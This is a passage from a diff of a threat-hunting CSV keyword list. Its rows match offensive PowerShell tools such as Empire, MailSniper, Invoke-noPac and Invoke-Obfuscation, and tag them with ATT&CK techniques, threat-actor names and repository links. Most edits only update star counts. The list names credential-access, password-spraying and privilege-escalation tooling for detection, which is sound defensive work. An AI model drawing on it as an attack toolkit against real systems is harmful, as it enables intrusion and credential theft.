PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-noPac.*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","0","N/A","N/A","1","57","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" "*Invoke-NTLMAuth.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-Ntsd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Obfuscation*","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059 - T1140","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","3289","733","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z" -"*Invoke-OpenInboxFinder*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-OpenOWAMailboxInBrowser*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*Invoke-OxidResolver*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Oxidresolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-OxidResolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-P0wnedshell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-P0wnedshellx86*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-PacketKnock*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Paranoia.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1146","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PasswordSpray*","offensive_tool_keyword","MailSniper","Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.","T1114 T1550 T1555 T1212 T1558 T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" 
-"*Invoke-PasswordSprayEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-PasswordSprayEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-PasswordSprayGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-PasswordSprayOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Ntsd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Obfuscation -ScriptPath *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-Obfuscation*","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059 - T1140","TA0002 - TA0003 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","3290","733","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z" +"*Invoke-Obfuscation.psd1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-OpenInboxFinder*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-OpenOWAMailboxInBrowser*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Invoke-OxidResolver*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Oxidresolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 
AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-OxidResolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-P0wnedshell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-P0wnedshellx86*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-PacketKnock*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Paranoia.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1146","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PasswordSpray*","offensive_tool_keyword","MailSniper","Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.","T1114 T1550 T1555 T1212 T1558 T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
